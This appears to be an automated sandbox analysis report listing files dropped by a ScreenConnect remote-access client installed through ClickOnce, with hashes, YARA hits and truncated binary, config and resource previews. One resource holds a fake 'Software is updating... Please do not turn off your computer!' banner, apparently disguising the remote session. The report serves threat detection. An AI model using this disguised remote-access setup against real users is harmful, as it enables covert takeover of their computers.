                                                                                                                                                                                                                                                      SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                      MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                      SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                      SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                      SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81696
                                                                                                                                                                                                                                                      Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                      MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                      SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                      SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                      SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):548352
                                                                                                                                                                                                                                                      Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                      MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                      SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                      SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                      SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iB............" ..0..V...........p... ........... ....................................@.................................qp..O.......t............................o..8............................................ ............... ..H............text....T... ...V.................. ..`.rsrc...t............X..............@..@.reloc...............\..............@..B.................p......H........B...,..................To........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1721856
                                                                                                                                                                                                                                                      Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                      MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                      SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                      SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                      SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..>...........\... ...`....... ...............................o....@.................................?\..O....`..|............................[..8............................................ ............... ..H............text....<... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................s\......H.......H..................0....[........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):600864
                                                                                                                                                                                                                                                      Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                      MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                      SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                      SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`...........@.................................5...O.... .................. )...@..........8............................................ ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H....... F................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197120
                                                                                                                                                                                                                                                      Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                      MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                      SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                      SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                      SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ... ....... .......................`......].....@.................................-...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):359
                                                                                                                                                                                                                                                      Entropy (8bit):4.83753806903797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10+HwercYn:rHy2DLI4MWoHO8L9cAgRMZRCl1FHcY
                                                                                                                                                                                                                                                      MD5:17702A9E63BED7438F3217D594D6E35C
                                                                                                                                                                                                                                                      SHA1:7C556F344A57D5933A528F8B8CFD0363F15AE0E3
                                                                                                                                                                                                                                                      SHA-256:8BFD7D9E0BAC6BDE538DFBE31E8919933547F30248E747C5B38EB84472DF3701
                                                                                                                                                                                                                                                      SHA-512:642BB2D85ECB653DA779AFFAA4285612BC7EB08383967DB16D9F9CA709F6A46280E6E6C7605E850E5AEC28043828826CA6948982591C310374119785784B303B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.?....=Software is updating... Please do not turn off your computer!..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):256
                                                                                                                                                                                                                                                      Entropy (8bit):4.878405169379307
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJkw:rHy2DLI4MWoj12eKfKCKB
                                                                                                                                                                                                                                                      MD5:B5450F2285052D7D31714E92BAE6143E
                                                                                                                                                                                                                                                      SHA1:0904C6FE250983A97D5210DFEACCB1C1CF34D643
                                                                                                                                                                                                                                                      SHA-256:23054E289EB585EB0314C44FD753ED3803C012E06B954926F3FC7167A370F928
                                                                                                                                                                                                                                                      SHA-512:79DA469F0C4ACB50D9B399086ED171C69E00C4CF5CB8A2089FD49F5864C1BF46E8434FB23CD210ABB83B88FF06E435A92C8E926B435BFB03EA207D5D7069723E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):50133
                                                                                                                                                                                                                                                      Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                      MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                      SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                      SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                      SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26722
                                                                                                                                                                                                                                                      Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                      MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                      SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                      SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                      SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2089
                                                                                                                                                                                                                                                      Entropy (8bit):4.688974504275539
